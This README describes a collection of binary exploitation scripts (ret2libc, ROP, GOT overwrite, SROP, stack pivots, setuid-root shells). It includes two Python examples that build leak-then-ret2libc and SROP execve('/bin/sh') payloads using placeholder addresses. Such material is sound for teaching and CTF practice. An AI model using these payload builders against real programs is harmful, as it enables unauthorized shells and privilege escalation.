A collection of exploit scripts/templates with short descriptions, covering common binary exploitation techniques (ROP, ret2libc, stack pivots, leaks, SROP, GOT overwrite, etc.).
The collection will be expanded over time.
- canary_ret2libc.py -> Leaks the stack canary and a libc address, rewrites the return address while keeping the canary intact, then returns into libc (e.g., system) to spawn a shell.
- fill_registers.py -> Sets specific CPU registers via pop gadgets to prepare syscall/function arguments or a stack pivot for a ROP chain.
- got_overwrite.py -> Overwrites a GOT entry so the next call through the PLT lands in attacker-controlled code or a different libc function (e.g., puts -> system).
- leaking_addr.py -> Leaks a memory address (binary or libc) via an information disclosure so the ASLR base and symbol offsets can be computed.
- leaking_addr2.py -> Alternative leak (e.g., format string or write primitive) to obtain addresses for an ASLR/PIE bypass.
- pie_canary_ret2win.py -> Defeats PIE and the stack canary with leaks, then redirects execution to an in-binary "win" function.
- pie_ret2libc.py -> Uses a leak to defeat PIE/ASLR, then returns into libc to call system or execve.
- ret2libc.py -> Returns into libc functions (such as system) using known libc addresses to execute a shell; no shellcode is injected, so it works with NX enabled.
- ret2syscall.py -> Prepares the registers with gadgets and triggers a syscall directly (e.g., execve) without going through libc.
- rop.py -> Chains gadgets (ROP) to perform arbitrary actions or call functions without injecting code.
- srop.py -> Builds a sigreturn frame and triggers rt_sigreturn so the kernel loads every register from it at once, then lands in a syscall (SROP).
- leaking_addr3.py -> Leaks addresses over an SSH channel or another remote service to bypass ASLR remotely.
- stack_pivot.py -> Performs a stack pivot (e.g., xchg rax, rsp / leave; ret / add rsp, N) to point RSP at attacker-controlled data holding the ROP chain; useful when the overflow is too short for the whole chain.
- ret2csu_ret2win.py -> Uses the gadgets in __libc_csu_init (ret2csu) to control the argument registers (edi, rsi, rdx) and call an in-binary "ret2win" function when no direct pop gadgets are available (binaries built against glibc 2.34 and later no longer contain __libc_csu_init).
- hijack_shellcode.py -> Places shellcode in the input buffer and overwrites the return address to jump to it; requires an executable stack (NX disabled) and a known or leaked buffer address.
- ret2libc_setuid(0).py -> Leaks a libc address, then builds a ROP chain that calls setuid(0) before system("/bin/sh") so a setuid-root target drops a root shell.
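The leak-then-return flow shared by canary_ret2libc.py, leaking_addr.py, ret2libc.py and ret2libc_setuid(0).py, written out as an added example in plain Python (struct only, no pwntools) that is not part of this collection. The buffer size, gadget addresses, PLT/GOT addresses and libc symbol offsets are constructed placeholders for a hypothetical non-PIE x86-64 binary, and the canary is assumed to have been leaked already by a separate disclosure. It shows the two stages: leak the runtime address of puts through puts@plt, derive the libc base and sanity-check it, then rebuild the stack frame with the canary preserved and return into setuid/system.

```python
import struct

# Constructed values for illustration only. In a real exploit BUF_SIZE comes from
# the crash offset (cyclic pattern), the gadget addresses from ROPgadget/ropper on
# the target binary, and the libc offsets from the exact libc build the target
# loads (readelf -s on that file, or a libc database).
BUF_SIZE = 72                 # bytes from the start of the buffer to the canary (assumed)
POP_RDI_RET = 0x4011c3        # hypothetical "pop rdi; ret" gadget in a non-PIE binary
RET = 0x40101a                # hypothetical lone "ret" gadget, used for stack alignment
PUTS_PLT = 0x401030           # hypothetical puts@plt
PUTS_GOT = 0x404018           # hypothetical puts@got.plt
MAIN = 0x401196               # hypothetical main(), re-entered after the leak stage
LIBC_PUTS_OFF = 0x80ed0       # hypothetical symbol offsets inside the target's libc
LIBC_SYSTEM_OFF = 0x50d70
LIBC_SETUID_OFF = 0xe8990
LIBC_BINSH_OFF = 0x1d8678


def p64(value):
    return struct.pack("<Q", value)


def parse_canary(raw):
    """Canary slot bytes -> integer. On x86-64 glibc the low byte is always 0x00
    (so string functions stop on it); anything else means the leak is misaligned."""
    canary = struct.unpack("<Q", raw[:8])[0]
    if canary & 0xff:
        raise ValueError("canary low byte is not 0x00: leak offset is wrong")
    return canary


def parse_puts_leak(raw):
    """puts() stops at the first NUL, so a userland pointer comes back as 6 bytes
    followed by the newline puts appends. Pad back to 8 bytes before unpacking."""
    raw = raw.rstrip(b"\n")[:8]
    if not 6 <= len(raw) <= 8:
        raise ValueError("unexpected leak length %d" % len(raw))
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked_puts):
    """libc base = runtime address of a symbol minus its offset in the library.
    A base that is not page aligned means the offsets (the libc build) are wrong."""
    base = leaked_puts - LIBC_PUTS_OFF
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page aligned: wrong libc offsets" % base)
    return base


def frame(canary, saved_rbp=0):
    """Overflow up to the return address while keeping the canary intact."""
    return b"A" * BUF_SIZE + p64(canary) + p64(saved_rbp)


def leak_stage(canary):
    """Stage 1: puts(puts@got) prints the runtime address of puts, then re-enter
    main so the overflow can be hit a second time with the real payload."""
    return frame(canary) + p64(POP_RDI_RET) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)


def shell_stage(canary, base, setuid_root=False, align=True):
    """Stage 2: optional setuid(0), then system("/bin/sh")."""
    chain = frame(canary)
    if setuid_root:
        chain += p64(POP_RDI_RET) + p64(0) + p64(base + LIBC_SETUID_OFF)
    if align:
        # system() executes movaps on the stack and needs RSP 16-byte aligned at
        # entry; a lone "ret" shifts RSP by 8. Whether it is needed depends on the
        # target's stack state, so if system() crashes on movaps, flip this flag.
        chain += p64(RET)
    chain += p64(POP_RDI_RET) + p64(base + LIBC_BINSH_OFF) + p64(base + LIBC_SYSTEM_OFF)
    return chain


if __name__ == "__main__":
    # Constructed stand-ins for the two leaks a real run would read from the target.
    canary = parse_canary(bytes.fromhex("00112233445566ab"))
    base = libc_base(parse_puts_leak(b"\xd0\x0e\x48\xf7\xff\x7f\n"))
    print("canary 0x%016x  libc base 0x%x" % (canary, base))
    print("stage 1: %d bytes, stage 2: %d bytes"
          % (len(leak_stage(canary)), len(shell_stage(canary, base, setuid_root=True))))
```

The two checks (canary low byte, page-aligned base) are the ones that catch the most common failures before anything is sent: a leak taken one byte off, or offsets pulled from a different libc build than the one the target actually maps.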
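The frame that srop.py relies on, built by hand as an added example that is not the collection's code (and not pwntools' SigreturnFrame), following the layout rt_sigreturn reads on x86-64 Linux: struct ucontext, then struct sigcontext_64, then uc_sigmask. The gadget, "/bin/sh" and stack addresses in the usage are constructed placeholders, and the padding length is assumed to cover the buffer and the saved rbp.

```python
import struct

# Field order of the x86-64 rt_sigreturn frame as the kernel reads it after the
# syscall: struct ucontext (uc_flags, uc_link, uc_stack) followed by struct
# sigcontext_64 and then uc_sigmask. Every slot is 8 bytes; cs/gs/fs/ss share
# one slot as four 16-bit selectors.
_FIELDS = (
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip", "eflags",
    "csgsfs", "err", "trapno", "oldmask", "cr2", "fpstate",
) + tuple("reserved%d" % i for i in range(8)) + ("sigmask",)

OFFSETS = {name: 8 * i for i, name in enumerate(_FIELDS)}
FRAME_SIZE = 8 * len(_FIELDS)   # 0x130 bytes

SYS_RT_SIGRETURN = 15
SYS_EXECVE = 59
USER_CS = 0x33                  # Linux x86-64 user code selector (__USER_CS)
USER_SS = 0x2b                  # Linux x86-64 user data/stack selector (__USER_DS)


def sigreturn_frame(**regs):
    """Build a frame; fields not given are zero. fpstate=0 tells the kernel there
    is no FPU state to restore, which keeps the frame self-contained."""
    unknown = set(regs) - set(_FIELDS)
    if unknown:
        raise ValueError("unknown frame fields: %s" % sorted(unknown))
    values = {name: 0 for name in _FIELDS}
    values["csgsfs"] = USER_CS | (USER_SS << 48)   # cs in the low word, ss in the high word
    values.update(regs)
    return b"".join(struct.pack("<Q", values[name]) for name in _FIELDS)


def read_field(frame, name):
    return struct.unpack_from("<Q", frame, OFFSETS[name])[0]


def read_selectors(frame):
    cs, gs, fs, ss = struct.unpack_from("<HHHH", frame, OFFSETS["csgsfs"])
    return {"cs": cs, "gs": gs, "fs": fs, "ss": ss}


def execve_frame(binsh, syscall_gadget, new_rsp):
    """Registers for execve("/bin/sh", NULL, NULL). rip points at a "syscall"
    (or "syscall; ret") gadget so the kernel returns straight into the syscall."""
    return sigreturn_frame(rax=SYS_EXECVE, rdi=binsh, rsi=0, rdx=0,
                           rip=syscall_gadget, rsp=new_rsp)


def srop_payload(padding, pop_rax_ret, syscall_gadget, binsh, new_rsp):
    """Overflow -> pop rax; ret (rax = 15) -> syscall -> the kernel loads every
    register from the frame that follows on the stack. After the syscall
    instruction RSP points exactly at the frame, which is why it comes last."""
    frame = execve_frame(binsh, syscall_gadget, new_rsp)
    return (b"A" * padding + struct.pack("<Q", pop_rax_ret)
            + struct.pack("<Q", SYS_RT_SIGRETURN) + struct.pack("<Q", syscall_gadget)
            + frame)


if __name__ == "__main__":
    # Constructed addresses: a "pop rax; ret" gadget, a "syscall; ret" gadget, a
    # "/bin/sh" string in .data and a writable address for the new stack.
    payload = srop_payload(40, 0x4011a0, 0x40118a, 0x404060, 0x404800)
    frame = payload[-FRAME_SIZE:]
    for name in ("rax", "rdi", "rsi", "rdx", "rsp", "rip"):
        print("%-6s @0x%03x = 0x%x" % (name, OFFSETS[name], read_field(frame, name)))
    print("selectors", read_selectors(frame), "payload %d bytes" % len(payload))
```

The same frame, with rsp pointed at a writable region and rip at a "syscall; ret" gadget, chains further syscalls (mprotect, then a return into shellcode is the classic use) without needing a pop gadget for each register, which is what makes SROP attractive on gadget-poor binaries.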
Using these exploits against targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by these scripts.